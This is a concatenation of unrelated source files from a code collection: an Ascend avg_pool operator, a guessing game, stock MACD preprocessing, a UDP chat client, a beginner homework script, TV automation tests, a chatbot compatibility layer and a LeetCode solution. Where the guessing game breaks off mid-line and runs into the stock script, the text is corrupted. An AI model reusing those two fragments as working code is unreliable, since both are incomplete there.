RuntimeError(errorInfo,\n \"In op[%s], the num of dimensions of input[%s]\"\n \"should be in the range of [%s, %s],\"\n \"but actually is [%s].\" %\n (errorInfo['op_name'], errorInfo['param_name'],\n errorInfo['min_value'], errorInfo['max_value'],\n errorInfo['real_value']))\n elif ksize[0] != 1 or ksize[1] != 1:\n errorInfo = {}\n errorInfo['errCode'] = OP_ERROR_CODE_000\n errorInfo['op_name'] = 'avg_pool'\n errorInfo['param_name'] = \",\".join((\"ksize[0]\", \"ksize[1]\"))\n errorInfo['expected_value'] = '1'\n errorInfo['real_value'] = \",\".join((ksize[0], ksize[1]))\n raise RuntimeError(\"In op[%s], the parameter[%s] should be [%s],\"\n \" but actually is [%s].\" %\n (errorInfo['op_name'], errorInfo['param_name'],\n errorInfo['expected_value'],\n errorInfo['real_value']))\n if len(strides) != 4:\n errorInfo = {}\n errorInfo['errCode'] = OP_ERROR_CODE_012\n errorInfo['op_name'] = 'avg_pool'\n errorInfo['param_name'] = 'strides'\n errorInfo['min_value'] = '4'\n errorInfo['max_value'] = '4'\n errorInfo['real_value'] = len(strides)\n raise RuntimeError(errorInfo,\n \"In op[%s], the num of dimensions of input[%s]\"\n \"should be in the range of [%s, %s], but\"\n \"actually is [%s].\" %\n (errorInfo['op_name'], errorInfo['param_name'],\n errorInfo['min_value'], errorInfo['max_value'],\n errorInfo['real_value']))\n elif strides[0] != 1 or strides[1] != 1:\n errorInfo = {}\n errorInfo['errCode'] = OP_ERROR_CODE_000\n errorInfo['op_name'] = 'avg_pool'\n errorInfo['param_name'] = \",\".join((\"strides[0]\", \"strodes[1]\"))\n errorInfo['expected_value'] = '1'\n errorInfo['real_value'] = \",\".join((strides[1], strides[1]))\n raise RuntimeError(\"In op[%s], the parameter[%s] should be [%s],\"\n \" but actually is [%s].\" %\n (errorInfo['op_name'], errorInfo['param_name'],\n errorInfo['expected_value'],\n errorInfo['real_value']))\n else:\n errorInfo = {}\n errorInfo['errCode'] = OP_ERROR_CODE_015\n errorInfo['op_name'] = 'avg_pool'\n errorInfo['param_name'] = 'x'\n errorInfo['excepted_format_list'] = \",\".join((\"NC1HWC0\",\n \"NCHW\", \"NHWC\"))\n errorInfo['format'] = data_format\n raise RuntimeError(errorInfo, \"In op[%s], the format[%s] of input\"\n \"should be one of [%s],\"\n \"but actually is 
[%s].\"\n % (errorInfo['op_name'], errorInfo['param_name'],\n errorInfo['excepted_format_list'],\n errorInfo['format']))\n\n\ndef get_corrected_pad(input_pad):\n \"\"\"\n algorithm:\n get corrected pad value\n\n Parameters\n ----------\n input_pad: the value of pad\n Returns\n -------\n output_pad: the value of pad\n \"\"\"\n if input_pad < 0:\n output_pad = 0\n else:\n output_pad = input_pad\n return output_pad\n\n\ndef avg_pool_check_rule(input_shape, input_dtype,\n output_dtype, input_format, ksize, strides,\n data_format, kernel_name):\n \"\"\"\n :param input_shape: shape of input_data\n :param input_dtype: dtype of input_data\n :param output_dtype: dtype of output_data\n :param ksize: the window of avgpooling\n :param strides: the stride of avgpooling window\n :param data_format: NHWC default\n :param kernel_name: cce kernel name\n :return: None\n\n \"\"\"\n # check input and output\n check_shape(input_shape)\n check_dtype(input_dtype, [\"float16\", \"int8\"])\n check_dtype(output_dtype, [\"float16\", \"int8\", \"int32\"])\n\n check_window_rule(ksize, strides, data_format)\n\n\ndef avg_pool_compute1(x, y, ksize, strides,\n padding=\"VALID\", data_format=\"NHWC\",\n is_fused_compute=True,\n kernel_name=\"avg_pool\"):\n \"\"\"\n describe compute\n return: tensor\n \"\"\"\n # create window and stride for pooling2d\n if data_format in (\"NHWC\",):\n window = [ksize[1], ksize[2]]\n stride = [strides[1], strides[2]]\n else:\n window = [ksize[2], ksize[3]]\n stride = [strides[2], strides[3]]\n\n window = list(window)\n stride = list(stride)\n\n # l1 fusion and l2 fusion\n l1_fusion_type = x.op.attrs[\"L1_fusion_type\"].value \\\n if \"L1_fusion_type\" in x.op.attrs else -1\n fusion_params = get_fusion_params(x, y, is_fused_compute)\n in_select_read_flag = fusion_params.get(\"in_select_read_flag\")\n in_valid_shape = fusion_params.get(\"in_valid_shape\")\n in_slice_offset = fusion_params.get(\"in_slice_offset\")\n\n if in_select_read_flag:\n select_tensor_in = tvm.compute(in_valid_shape,\n lambda n, c1, h, w, c0:\n x(n, c1, h + in_slice_offset[2], w, c0),\n name=\"tensor_read_select\",\n attrs=x.op.attrs)\n res = te.lang.cce.pooling2d(select_tensor_in, window, stride, \"AVG\",\n padding, fusion_params=fusion_params)\n elif l1_fusion_type == 1:\n x.op.attrs[\"addr_type\"].value = 1\n in_l1_flag = True\n fusion_params[\"in_l1_flag\"] = in_l1_flag\n\n l1_width_fusion_in = tvm.compute(x.shape,\n lambda n, c1, h, w, c0:\n x(n, c1, h, w, c0),\n name=\"l1_width_fusion_tensor_in\",\n attrs=x.op.attrs)\n res = te.lang.cce.pooling2d(l1_width_fusion_in, window, stride,\n \"AVG\", padding,\n fusion_params=fusion_params)\n else:\n res = te.lang.cce.pooling2d(x, window, stride, \"AVG\", padding,\n fusion_params=fusion_params)\n\n return res\n\n\n# pylint: disable=unnecessary-lambda,redefined-builtin,too-many-locals\n# pylint: disable=unnecessary-lambda,too-many-statements\n@fusion_manager.register(\"avg_pool\")\ndef avg_pool_compute(x, filter, bias, y, ksize, strides, padding=\"VALID\",\n data_format=\"NHWC\", offset_x=0, kernel_name=\"avg_pool\"):\n \"\"\"\n algorithm: avg_pool\n calculating the average pooling\n\n Parameters\n ----------\n x : dict, shape and dtype of input_data, only support float16\n filter : dict, shape and dtype of input_data, only support float16\n y : dict, shape and dtype of output_data, only support float16\n ksize : list or tuple, the window of avgpooling, only support avgpooling\n in H or W\n strides : list or tuple, the stride of avgpooling window, only support\n avgpooling in 
H or W\n padding : str, the mode of padding, support padding and not padding\n data_format : str, default = \"NHWC\"\n kernel_name : kernel name, default value is \"avg_pool\"\n\n Returns\n -------\n None\n \"\"\"\n out_dtype = y.get(\"dtype\")\n # create window and stride for pooling2d\n if data_format in (\"NHWC\",):\n window = [ksize[1], ksize[2]]\n stride = [strides[1], strides[2]]\n else:\n window = [ksize[2], ksize[3]]\n stride = [strides[2], strides[3]]\n\n shape_x = x.shape\n input_h = shape_x[2]\n input_w = shape_x[3]\n dilations = (1, 1)\n\n dsl_flag = True\n\n if padding == \"SAME\":\n output_h = (input_h + stride[0] - 1) // stride[0]\n output_w = (input_w + stride[1] - 1) // stride[1]\n pad_row = (output_h - 1) * stride[0] + \\\n ((window[0] - 1) * dilations[0] + 1) - input_h\n pad_col = (output_w - 1) * stride[1] + \\\n ((window[1] - 1) * dilations[1] + 1) - input_w\n pad_top = pad_row // 2\n pad_bottom = pad_row - pad_top\n pad_left = pad_col // 2\n pad_right = pad_col - pad_left\n pad_top = get_corrected_pad(int(pad_top))\n pad_bottom = get_corrected_pad(int(pad_bottom))\n pad_left = get_corrected_pad(int(pad_left))\n pad_right = get_corrected_pad(int(pad_right))\n pad = (pad_top, pad_bottom, pad_left, pad_right)\n else:\n pad = (0, 0, 0, 0)\n if int(input_h) == int(window[0]) and int(input_h) == int(window[1]):\n res = avg_pool_compute1(x, y, ksize, strides, padding, data_format,\n is_fused_compute=True, kernel_name=kernel_name)\n else:\n l1_fusion_para = avgpool_conv2d_fusion_para(x, y)\n res = te.lang.cce.te_compute.depthwise_conv2d_compute(\n x, filter, out_dtype.lower(), stride, pad, dilations, {\n \"bias_tensor\": bias, \"dsl_flag\": dsl_flag,\n \"offset_x\": offset_x}, l1_fusion_para, kernel_name)\n\n return res\n\n\n@check_op_params(REQUIRED_INPUT, OPTION_INPUT, OPTION_INPUT, REQUIRED_OUTPUT,\n REQUIRED_ATTR_LIST_INT, REQUIRED_ATTR_LIST_INT,\n REQUIRED_ATTR_STR, OPTION_ATTR_STR, OPTION_ATTR_INT,\n KERNEL_NAME)\ndef avg_pool(x, filter, bias, y, ksize, strides,\n padding=\"VALID\", data_format=\"NHWC\", offset_x=0,\n kernel_name=\"avg_pool\"):\n \"\"\"\n Parameters\n ----------\n x : dict, shape and dtype of input_data, only support float16, shape is 4\n dims, format is NCHW\n\n y : dict, shape and dtype of output_data, only support float16\n\n ksize : list or tuple, the window of avgpooling, only support avgpooling\n in H or W\n\n strides : list or tuple, the stride of avgpooling window, only support\n avgpooling in H or W\n\n padding : str, the mode of padding, support padding and not padding\n\n data_format : str, default = \"NHWC\"\n\n kernel_name : cce kernel name, default value is \"avg_pool_cce\"\n\n Returns\n -------\n None\n \"\"\"\n # get shape&dtype\n input_shape = x.get(\"shape\")\n input_dtype = x.get(\"dtype\")\n input_dtype = input_dtype.lower()\n output_dtype = y.get(\"dtype\")\n output_dtype = output_dtype.lower()\n input_format = x.get(\"format\")\n\n # check others parameter\n avg_pool_check_rule(input_shape, input_dtype,\n output_dtype, input_format, ksize, strides,\n data_format, kernel_name)\n\n # set tensor attrs, during L1 fusion these attrs will assign by te_fusion\n addr_type = x.get(\"addr_type\", 0)\n valid_shape = x.get(\"valid_shape\", [])\n slice_offset = x.get(\"slice_offset\", [])\n split_index = x.get(\"split_index\", 0)\n l1_fusion_type = x.get(\"L1_fusion_type\", -1)\n attr = {\"addr_type\": addr_type,\n \"valid_shape\": valid_shape,\n \"slice_offset\": slice_offset,\n \"split_index\": split_index,\n \"L1_fusion_type\": 
l1_fusion_type}\n is_l1fusion = l1_fusion_type in (0, 1)\n\n if data_format in (\"NHWC\",):\n ksizeH = ksize[1]\n ksizeW = ksize[2]\n hw = ksizeH * ksizeW\n window = [ksize[1], ksize[2]]\n stride = [strides[1], strides[2]]\n else:\n ksizeH = ksize[2]\n ksizeW = ksize[3]\n hw = ksizeH * ksizeW\n window = [ksize[2], ksize[3]]\n stride = [strides[2], strides[3]]\n\n\n # compute\n # create tensor_in\n tensor_in = tvm.placeholder(input_shape, name=\"tensor_in\",\n dtype=input_dtype, attrs=attr)\n\n if filter is not None:\n filter_shape = filter.get(\"shape\")\n filter_dtype = filter.get(\"dtype\").lower()\n filter_c1 = filter_shape[0] / hw\n if filter_dtype in(\"float16\", \"float32\"):\n filter_shape_5d = filter_c1, ksizeH, ksizeW, filter_shape[2], \\\n filter_shape[3]\n else:\n\n filter_shape_5d = filter_shape[0], ksizeH, ksizeW, 32, \\\n 32\n filter_in = tvm.placeholder(filter_shape_5d, name=\"filter_in\",\n dtype=filter_dtype, attrs=attr)\n bias_tensor = None\n if bias is not None and bias != {}:\n bias_shape = bias.get(\"shape\")\n bias_tensor = tvm.placeholder(bias_shape,\n name='bias_tensor',\n dtype=output_dtype.lower())\n\n out_dtype = y.get(\"dtype\")\n\n shape_x = input_shape\n input_h = shape_x[2]\n input_w = shape_x[3]\n dilations = (1, 1)\n dsl_flag = False\n\n if padding == \"SAME\":\n output_h = (input_h + stride[0] - 1) // stride[0]\n output_w = (input_w + stride[1] - 1) // stride[1]\n pad_row = (output_h - 1) * stride[0] + \\\n ((window[0] - 1) * dilations[0] + 1) - input_h\n pad_col = (output_w - 1) * stride[1] + \\\n ((window[1] - 1) * dilations[1] + 1) - input_w\n pad_top = pad_row // 2\n pad_bottom = pad_row - pad_top\n pad_left = pad_col // 2\n pad_right = pad_col - pad_left\n pad_top = get_corrected_pad(int(pad_top))\n pad_bottom = get_corrected_pad(int(pad_bottom))\n pad_left = get_corrected_pad(int(pad_left))\n pad_right = get_corrected_pad(int(pad_right))\n pad = (pad_top, pad_bottom, pad_left, pad_right)\n else:\n pad = (0, 0, 0, 0)\n res = te.lang.cce.te_compute.depthwise_conv2d_compute(\n tensor_in, filter_in, out_dtype.lower(), stride, pad, dilations, {\n \"bias_tensor\": bias_tensor, \"dsl_flag\": dsl_flag,\n \"offset_x\": offset_x}, None, kernel_name)\n\n\n tensor_list = [tensor_in, filter_in, res]\n if bias_tensor is not None:\n tensor_list = [tensor_in, filter_in, bias_tensor, res]\n else:\n res = avg_pool_compute1(tensor_in, y, ksize, strides, padding,\n data_format, False, kernel_name)\n\n tensor_list = [tensor_in, res]\n # schedule\n with tvm.target.cce():\n sch = generic.auto_schedule(res)\n\n # build\n config = {\"print_ir\": False,\n \"need_build\": False,\n \"name\": kernel_name,\n \"tensor_list\": tensor_list,\n \"l1_fusion_option\": is_l1fusion}\n\n te.lang.cce.cce_build_code(sch, config)\n\n","repo_name":"gekowa/ascend-opp","sub_path":"op_impl/built-in/ai_core/tbe/impl/avg_pool.py","file_name":"avg_pool.py","file_ext":"py","file_size_in_byte":22718,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16152474811","text":"import random\r\n\r\nn=random.randint(1,100)\r\n#print(f'n:{n}')\r\n\r\nwhile True:\r\n u=int(input('1~100사이의 수:'))\r\n\r\n a=abs(u-n)\r\n\r\n m=''\r\n if a>=20:\r\n m='너무'\r\n\r\n if u>n:\r\n print(f'{m}크다')\r\n elif u=0, df['변화량'], 0)\ndf['하락폭'] = np.where(df['변화량'] <0, df['변화량'].abs(), 0)\n\n# MACD & MACD oscillator\nmacd_short, macd_long, macd_signal=12, 26, 9 #기본값\ndf[\"MACD_short\"] = df[\"Close\"].ewm(span = macd_short).mean()\ndf[\"MACD_long\"] = df[\"Close\"].ewm(span 
= macd_long).mean()\ndf[\"MACD\"] = df.apply(lambda x: (x[\"MACD_short\"] - x[\"MACD_long\"]), axis = 1)\ndf[\"MACD_signal\"] = df[\"MACD\"].ewm(span = macd_signal).mean() \ndf[\"MACD_oscillator\"] = df.apply(lambda x:(x[\"MACD\"] - x[\"MACD_signal\"]), axis = 1)\n\n# Welles Wilder moving average\n# df['AU'] = df['상승폭'].ewm(alpha = 1/14, min_periods = 14).mean()\n# df['AD'] = df['하락폭'].ewm(alpha = 1/14, min_periods = 14).mean()\n# df['RSI'] = df['AU'] / (df['AU'] + df['AD']) * 100\n\n# Buy/sell by MACD (buy/sell on a zero cross)\ndf[\"MACD_sign\"] = df.apply(lambda x: (\"매수\" if x[\"MACD\"]<x[\"MACD_signal\"] else \"매도\"), axis=1)\n\n# Buy/sell by RSI 30 70 (buy on crossing 30, sell on crossing 70)\n#df[\"RSI_sign\"] = df.apply(lambda x: (\"매수\" if x[\"RSI\"]<50 else \"매도\"), axis=1)\n\ndf = df.sort_index(axis=1)\n\nfor x in strategy:\n if x=='RSI':\n k = df[['Close', 'RSI', 'RSI_sign']]\n elif x=='MACD':\n k = df[['Close', 'MACD', \"MACD_sign\"]]\n # else :\n # k = df[['Close', 'MACD_oscillator', \"MACD_oscillator_sign\"]]\n\n k = k.dropna()\n k.to_csv(f\"C:/Users/SLOWLAB/.conda/anomaly_transformer_in_stock_market/data/{x}.csv\")","repo_name":"jaeho23/anomaly_transformer_in_stock_market","sub_path":"samsungelectronic/data_preprocessing.py","file_name":"data_preprocessing.py","file_ext":"py","file_size_in_byte":2083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"19154444974","text":"import socket\r\nimport threading\r\n\r\n\r\nclass Classe_Thread(threading.Thread):\r\n def __init__(self): \r\n threading.Thread.__init__(self)\r\n self.running = True \r\n\r\n def run(self):\r\n while self.running:\r\n data, indirizzo = s.recvfrom(4096) # receive the messages sent to me\r\n print(data.decode())\r\n\r\n\r\ndef main():\r\n global s\r\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n\r\n nick= input(\"Inserisci il tuo nickname: \")\r\n s.sendto((f\"nickname:{nick}\").encode(), (\"192.168.0.126\", 5000)) # send the nickname to the server\r\n\r\n messaggio, indirizzo= s.recvfrom(4096) # print the connection confirmation\r\n print(messaggio.decode())\r\n\r\n client = Classe_Thread()\r\n client.start()\r\n\r\n if messaggio.decode()==\"ok\": # if we receive the ok, the chat is active and messages can be sent\r\n print(\"chat mode\")\r\n while True:\r\n # send messages to a peer by entering their nickname\r\n messaggio = input()\r\n s.sendto((f\"{nick}:{messaggio}\").encode(), (\"192.168.0.126\", 5000))\r\n \r\n\r\n\r\nmain()","repo_name":"MarcoBertoglio/TPSIT-5-AROB","sub_path":"clientUDP_thread.py","file_name":"clientUDP_thread.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"6992933348","text":" #Data types in Python\n\n#Text type data = str, used to store textual data\n#Numeric data types: \n #int = integer, used to hold whole numbers \n #float used to hold decimal numbers \n #complex used to hold complex numbers\n#Sequence data types : \n #list = used to hold more than one item (to form a list)\n #tuple = unlike a list, it is immutable and stays as it was first defined \n #range = used in for loops and defines an interval. For example == for i in range(0,11): print (i) means from 0 up to 11\n#Mapping (addressing) data types : dict == Cannot be ordered but is mutable and can be looked up by a key. 
It is defined in key:value form.\n#Set data types :\n #set == Sets in Python are similar to lists, but as a difference the elements in a set cannot be ordered or indexed. That is, we cannot know in what order an element added to a set is kept.\n #frozenset == The same as a set, but immutable. For this reason it is also called a restricted set.\n#boolean data type : bool == used to hold True-False values. \n#binary data types = bytes,bytearray,memoryview\n\n #Variables used on Kodlama.io\n#Mail address and user password : bool\n#Course progress percentage : float\n#Category, instructors : list\n#Course names : string\n\nuser_mail =\"tunahanyzc@gmail.com\"\nuser_pword = 12345\nget_mail= input (\"Lütfen mail adresinizi giriniz: \")\nget_user_pword= int (input (\"Lütfen şifrenizi giriniz: \"))\nif (get_mail == user_mail):\n if (get_user_pword == user_pword):\n print('Giriş başarılı.Hoşgeldiniz.')\n else:\n print('Hatalı veya eksik şifre girdiniz.')\nelse:\n print('Kullanıcı bulunamadı')\n\n","repo_name":"tunayzc/Python","sub_path":"homework1.py","file_name":"homework1.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"9009642488","text":"# Import Tkinter for GUI\nfrom tkinter import *\nfrom tkinter import ttk\nimport tkinter.font as tkFont\nimport time\nimport datetime\nimport threading\n# Import ADB_Action_Script.py; it must be in the same folder\nfrom daaf.ADB_Action_Scipt import ActionScript\n# Import the RC keys and App PKGs for easy scripting\nfrom daaf.RC_Code import SonyRCKey\nfrom daaf.AppList import AppList\nimport daaf.Power_Tools as pt\nfrom daaf.atvAuto import atvAuto\n\n\nclass Demo(atvAuto):\n\n def __init__(self, tkRoot):\n \"\"\" Initialize the UI and then Set Title Header\"\"\"\n super().__init__(tkRoot, \"Power OFF PSVue\") # Update the string\n\n # this is in minutes\n self.playback_time = 0.1\n\n def testCaseInfo(self):\n \"\"\" \n Set the test case info\n This is the one that shows on the left side of the screen\n \"\"\"\n self.makeInstructionLabel(\"Tune to HDMI1\")\n self.makeInstructionLabel(\"Playback HDMI1 for 1 hour\")\n self.makeInstructionLabel(\"Do Channel Change every 10 minutes\")\n\n self.makeInstructionLabel(\"Launch Netflix\")\n self.makeInstructionLabel(\"Playback Netflix content for 1 hour\")\n\n self.makeInstructionLabel(\"Launch Amazon\")\n self.makeInstructionLabel(\"Playback Amazon content for 1 hour\")\n\n self.makeInstructionLabel(\"Launch PS Vue\")\n self.makeInstructionLabel(\"Playback PS Vue content for 1 hour\")\n\n self.makeInstructionLabel(\"RC OFF TV\")\n\n def runThis(self):\n \"\"\" Below is where you assemble test cases\"\"\"\n\n # launch HDMI input\n self.press_home()\n self.wait_second(5)\n self.launch_hdmi_input(\"HDMI1\")\n\n # Do Channel Up every 10 minutes for 1 hour\n for i in range(1, 4):\n print(f'loop count {i}')\n self.channel_up()\n self.wait_minute(10)\n\n # Do Channel Down every 10 minutes for 1 hour\n for i in range(1, 4):\n print(f'loop count {i}')\n self.channel_down()\n self.wait_minute(10)\n\n # Launch and Playback Netflix\n self.launch_netflix()\n self.select_netflix_content()\n self.playback_netflix(self.playback_time)\n\n # Launch and playback Amazon\n self.launch_amazon()\n self.select_amazon_content()\n self.playback_amazon(self.playback_time)\n\n # Launch and Playback PSVue\n self.launch_psvue()\n self.select_psvue_content()\n self.playback_psvue(self.playback_time)\n\n # RC OFF the TV\n 
self.press_rc_key(\"POWER\")\n\n\n\n# Start the script\nroot = Tk()\nDemo(root).startApp()\n","repo_name":"DarrenVictoriano/atvAuto","sub_path":"power_off_psvue.py","file_name":"power_off_psvue.py","file_ext":"py","file_size_in_byte":2597,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"925237537","text":"import asyncio\nfrom functools import partial\nfrom typing import Any, Callable, Coroutine, Dict, List, Optional, TypeVar\n\nfrom nonebot import get_app, get_asgi, get_bots, get_driver\nfrom nonebot.adapters.cqhttp import Bot as CQBot\nfrom nonebot.adapters.cqhttp.event import Event as NoneBotEvent\nfrom nonebot.adapters.cqhttp.event import MessageEvent\nfrom nonebot.adapters.cqhttp.message import Message as NoneBotMessage\nfrom nonebot.exception import ApiNotAvailable\nfrom nonebot.matcher import Matcher\nfrom singledispatchmethod import singledispatchmethod\n\nfrom nonetrip.typing import Message_T\n\nfrom .message import Message, MessageSegment\n\n_AsyncCallable_T = TypeVar(\"_AsyncCallable_T\", bound=Callable[..., Coroutine])\n_HandlerDecorator = Callable[[_AsyncCallable_T], _AsyncCallable_T]\n_NoneBotHandler = Callable[[CQBot, NoneBotEvent], Coroutine]\n\n\nclass Event(dict):\n    \"\"\"\n    封装从 CQHTTP 收到的事件数据对象(字典),提供属性以获取其中的字段。\n    除 `type` 和 `detail_type` 属性对于任何事件都有效外,其它属性存在与否(不存在则返回\n    `None`)依事件不同而不同。\n    \"\"\"\n\n    @classmethod\n    def from_payload(cls, payload: NoneBotEvent) -> \"Event\":\n        \"\"\"\n        从 CQHTTP 事件数据构造 `Event` 对象。\n        \"\"\"\n        payload_dict = payload.dict()\n        if isinstance(payload, MessageEvent):\n            payload_dict[\"message\"] = Message([\n                MessageSegment(type_=segment.type, data=segment.data)\n                for segment in payload.message\n            ])\n        return cls(payload_dict)\n\n    @property\n    def type(self) -> str:\n        \"\"\"\n        事件类型,有 ``message``、``notice``、``request``、``meta_event`` 等。\n        \"\"\"\n        return self[\"post_type\"]\n\n    @property\n    def detail_type(self) -> str:\n        \"\"\"\n        事件具体类型,依 `type` 的不同而不同,以 ``message`` 类型为例,有\n        ``private``、``group``、``discuss`` 等。\n        \"\"\"\n        return self[f\"{self.type}_type\"]\n\n    @property\n    def sub_type(self) -> Optional[str]:\n        \"\"\"\n        事件子类型,依 `detail_type` 不同而不同,以 ``message.private`` 为例,有\n        ``friend``、``group``、``discuss``、``other`` 等。\n        \"\"\"\n        return self.get(\"sub_type\")\n\n    @property\n    def name(self):\n        \"\"\"\n        事件名,对于有 `sub_type` 的事件,为 ``{type}.{detail_type}.{sub_type}``,否则为\n        ``{type}.{detail_type}``。\n        \"\"\"\n        n = self.type + \".\" + self.detail_type\n        if self.sub_type:\n            n += \".\" + self.sub_type\n        return n\n\n    self_id: int  # 机器人自身 ID\n    user_id: Optional[int]  # 用户 ID\n    operator_id: Optional[int]  # 操作者 ID\n    group_id: Optional[int]  # 群 ID\n    discuss_id: Optional[int]  # 讨论组 ID\n    message_id: Optional[int]  # 消息 ID\n    message: Optional[Message]  # 消息\n    raw_message: Optional[str]  # 未经 CQHTTP 处理的原始消息\n    sender: Optional[Dict[str, Any]]  # 消息发送者信息\n    anonymous: Optional[Dict[str, Any]]  # 匿名信息\n    file: Optional[Dict[str, Any]]  # 文件信息\n    comment: Optional[str]  # 请求验证消息\n    flag: Optional[str]  # 请求标识\n\n    def copy(self):\n        return Event(**self)\n\n    def __getattr__(self, key) -> Optional[Any]:\n        return self.get(key)\n\n    def __setattr__(self, key, value) -> None:\n        self[key] = value\n\n    def __repr__(self) -> str:\n        return f\"\"\n\n\nclass CQHttp:\n    message_matcher = Matcher.new(\"message\")\n    message_handlers = []\n\n    notice_matcher = Matcher.new(\"notice\")\n    notice_handlers = []\n\n    request_matcher = Matcher.new(\"request\")\n    request_handlers = []\n\n    metaevent_matcher = Matcher.new(\"meta_event\")\n    metaevent_handlers 
= []\n\n _loop: asyncio.AbstractEventLoop\n\n @staticmethod\n async def _run_handlers(handlers: List[_NoneBotHandler], bot: CQBot,\n event: NoneBotEvent):\n asyncio.ensure_future(\n asyncio.gather(\n *map(lambda f: f(bot, event), handlers), # type: ignore\n return_exceptions=True))\n\n def __init__(self):\n get_driver().on_startup(\n lambda: setattr(self, \"_loop\", asyncio.get_running_loop()))\n\n @self.message_matcher.handle()\n async def handle_message(bot: CQBot, event: NoneBotEvent):\n return await self._run_handlers(self.message_handlers, bot, event)\n\n @self.notice_matcher.handle()\n async def handle_notice(bot: CQBot, event: NoneBotEvent):\n return await self._run_handlers(self.notice_handlers, bot, event)\n\n @self.request_matcher.handle()\n async def handle_request(bot: CQBot, event: NoneBotEvent):\n return await self._run_handlers(self.request_handlers, bot, event)\n\n @self.metaevent_matcher.handle()\n async def handle_metaevent(bot: CQBot, event: NoneBotEvent):\n return await self._run_handlers(self.metaevent_handlers, bot, event)\n\n @property\n def asgi(self):\n return get_asgi()\n\n @property\n def server_app(self):\n return get_app()\n\n @property\n def logger(self):\n from nonetrip.log import logger\n\n return logger\n\n @property\n def loop(self) -> asyncio.AbstractEventLoop:\n assert isinstance(self._loop, asyncio.AbstractEventLoop)\n return self._loop\n\n @property\n def bot(self) -> CQBot:\n for bot in get_bots().values():\n if not isinstance(bot, CQBot):\n continue\n return bot\n raise ApiNotAvailable(\"nonetrip\")\n\n def _handler_factory(\n self,\n function: Callable[[Event], Coroutine],\n post_type: Optional[str] = None,\n ) -> _NoneBotHandler:\n\n async def handler(bot: CQBot, event: NoneBotEvent):\n if post_type is not None and event.post_type != post_type:\n return\n nonebot_event = Event.from_payload(event)\n if nonebot_event is None:\n return\n return await function(nonebot_event)\n\n return handler\n\n @singledispatchmethod\n def on_message(self, arg: _AsyncCallable_T) -> _AsyncCallable_T:\n self.message_matcher.append_handler(self._handler_factory(arg))\n return arg\n\n @on_message.register # type:ignore\n def _on_specified_message(self, arg: str) -> _HandlerDecorator:\n\n def wrapper(function: _AsyncCallable_T) -> _AsyncCallable_T:\n self.message_matcher.append_handler(\n self._handler_factory(function, arg))\n return function\n\n return wrapper\n\n @singledispatchmethod\n def on_notice(self, arg):\n self.notice_matcher.append_handler(self._handler_factory(arg))\n return arg\n\n @on_notice.register # type: ignore\n def _on_specified_notice(self, arg: str) -> _HandlerDecorator:\n\n def wrapper(function: _AsyncCallable_T) -> _AsyncCallable_T:\n self.notice_matcher.append_handler(\n self._handler_factory(function, arg))\n return function\n\n return wrapper\n\n @singledispatchmethod\n def on_request(self, arg: _AsyncCallable_T) -> _AsyncCallable_T:\n self.request_matcher.append_handler(self._handler_factory(arg))\n return arg\n\n @on_request.register # type: ignore\n def _on_specified_request(self, arg: str) -> _HandlerDecorator:\n\n def wrapper(function: _AsyncCallable_T) -> _AsyncCallable_T:\n self.request_matcher.append_handler(\n self._handler_factory(function, arg))\n return function\n\n return wrapper\n\n @singledispatchmethod\n def on_metaevent(self, arg: _AsyncCallable_T) -> _AsyncCallable_T:\n self.metaevent_matcher.append_handler(self._handler_factory(arg))\n return arg\n\n @on_metaevent.register # type:ignore\n def _on_specified_metaevent(self, 
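The `on_message`/`on_notice`/`on_request` registrations in the poly.py record use `singledispatchmethod` so one decorator works both bare (`@bot.on_message`) and parameterized with a type string (`@bot.on_message('private')`). A stripped-down sketch of that dual-use dispatch, using the stdlib `functools.singledispatchmethod` (Python 3.8+) instead of the backport the record imports:

```python
from functools import singledispatchmethod

class Bus:
    def __init__(self):
        self.handlers = []  # (type_filter, function) pairs

    @singledispatchmethod
    def on_message(self, arg):
        # Bare form: @bus.on_message placed directly on a function.
        self.handlers.append((None, arg))
        return arg

    @on_message.register
    def _(self, arg: str):
        # Parameterized form: @bus.on_message("private") returns a decorator.
        def wrapper(func):
            self.handlers.append((arg, func))
            return func
        return wrapper

bus = Bus()

@bus.on_message
def any_message(event):
    print("got", event)

@bus.on_message("private")
def private_message(event):
    print("private", event)

print([(flt, fn.__name__) for flt, fn in bus.handlers])
# [(None, 'any_message'), ('private', 'private_message')]
```

Dispatch happens on the type of the first argument after `self`: a function hits the default implementation and is registered directly, while a string hits the registered overload and produces a decorator.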
arg: str) -> _HandlerDecorator:\n\n def wrapper(function: _AsyncCallable_T) -> _AsyncCallable_T:\n self.metaevent_matcher.append_handler(\n self._handler_factory(function, arg))\n return function\n\n return wrapper\n\n on_meta_event = on_metaevent\n\n async def send(self, event: Event, message: \"Message_T\", **kwargs):\n bot = get_bots().get(str(event.self_id))\n assert (bot is not None) and isinstance(bot, CQBot)\n message = message if isinstance(message, Message) else Message(message)\n return await bot.send(NoneBotEvent(**event), NoneBotMessage(message),\n **kwargs)\n\n async def call_action(self, action: str, **kwargs):\n return await self.bot.call_api(action, **kwargs)\n\n def __getattr__(self, key: str) -> Callable[..., Coroutine]:\n return partial(self.call_action, key)\n","repo_name":"nonebot/nonetrip","sub_path":"nonetrip/compat/poly.py","file_name":"poly.py","file_ext":"py","file_size_in_byte":8894,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"10735646022","text":"# https://leetcode.com/problems/remove-duplicates-from-sorted-list/\n#\n# Given a sorted linked list, delete all duplicates such that each element appear only once.\n#\n# For example,\n# Given 1->1->2, return 1->2.\n# Given 1->1->2->3->3, return 1->2->3\n\n# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def deleteDuplicates(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: ListNode\n \"\"\"\n if head == None: return None\n last, node = head, head.next\n while node != None:\n if node.val == last.val:\n last.next = node.next\n else:\n last = node\n node = node.next\n return 